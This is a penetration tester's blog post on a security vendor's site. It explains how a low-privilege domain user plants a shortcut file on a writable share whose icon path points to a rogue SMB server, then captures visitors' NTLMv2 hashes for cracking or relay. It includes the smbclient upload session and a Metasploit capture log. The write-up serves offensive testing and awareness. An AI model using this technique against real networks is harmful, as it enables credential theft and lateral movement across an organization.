Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

Oftentimes on an Internal pen test, I find myself with a limited-privilege domain user account. On a recent test, I got ahold of an account like this through various means of hackery. It didn't have local admin anywhere, it wasn't a member of any IT groups; it was just a super low privilege user from the Marketing department. The only real privilege it had was write access to the Marketing share. In a quest to gather more user accounts, I decided to abuse my write access to the share and drop a backdoored shortcut file.

The idea here is that we can create a random shortcut file that goes nowhere, but pulls its icon image from a remote share. When a domain user visits the marketing share with the malicious LNK file in it, Windows tries to load up all the pretty icons for the files on the share. In our case, Windows tries to grab the icon for our malicious LNK file, sees that it's on another share, and attempts to auth to the remote share to get the icon file. That remote share just so happens to be our rogue SMB server (running static challenges for Rainbow Tables goodness, of course).

Lets get to work.
Fire up a Windows machine to create a random shortcut file, and then edit the settings to have it pull its icon image from a local network share. Then, use a hex editor to swap the IP and sharename to point to our SMB listener:

9982_75a59a43-439b-4310-8ee6-7192b4768e83

Now, lets drop this file on our Marketing share:

# smbclient -U BANANASTAND/user%pass //10.0.0.5/marketing/Domain=[BANANASTAND] OS=[EMC-PEEL] Server=[COLDSTORAGE1]smb: \> put trustwave.lnkputting file trustwave.lnk as \trustwave.lnk (58.0 kb/s) (average 58.0 kb/s)smb: \> dir  .                                   D        0  Wed Mar 28 14:07:44 2012  Thumbs.db                          HS    94208  Tue Mar  6 09:56:01 2012  Sales Folder                        D        0  Thu Mar  8 11:36:10 2012  SCANNED CONTRACTS.lnk                      210  Mon Feb 13 12:52:04 2012  Shortcut to Sales Folder.lnk               279  Fri Oct 21 09:15:08 2011  Client folder                       D        0  Tue Mar 20 15:49:35 2012  trustwave.lnk                        A      475  Wed Mar 28 14:07:44 2012  Sales Folder - Shortcut.lnk                635  Tue Mar  6 09:55:09 201256721 blocks of size 8388608. 12215 blocks available


Great! When anyone visits the marketing share, they will see this inconspicuous shortcut file:

10982_a2a84627-4a15-4e84-9c7a-63245c368f40

By the time they see it, their goose has already been cooked (er...hacked?). Their workstation has already gone hunting for the icon file located on our rogue SMB share:

msf  auxiliary(smb) >[*] SMB Captured - 2012-12-10 12:32:00 -0500NTLMv2 Response Captured from 10.0.0.104:49240 - 10.0.0.104USER:pc903423 DOMAIN:BANANASTAND OS: LM:LMHASH:Disabled LM_CLIENT_CHALLENGE:DisabledNTHASH:5630qw4fwer7013acf5665bre2d2weab8 NT_CLIENT_CHALLENGE:0101000000000000sdfh22353yk2356jl450239r7ebwe093ew00000000020000000000000000000000


That's it. By simply tricking a user into browsing a share, we can grab their password hash and start crackin' (or smb_relay them, if you are feeling lucky). What's nice about this attack is that it isn't limited to your local broadcast net like ARP Spoofing or any of the NBNS / LLMNR trickery. Its also pretty stealthy, there is no pop up boxes or error messages - Windows tries to auth to the SMB server, fails to get the icon file, and just moves on. This gives you the opportunity to quietly collect password hashes from several other users and propagate throughout the network nicely. Mmmmm, hashes.

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo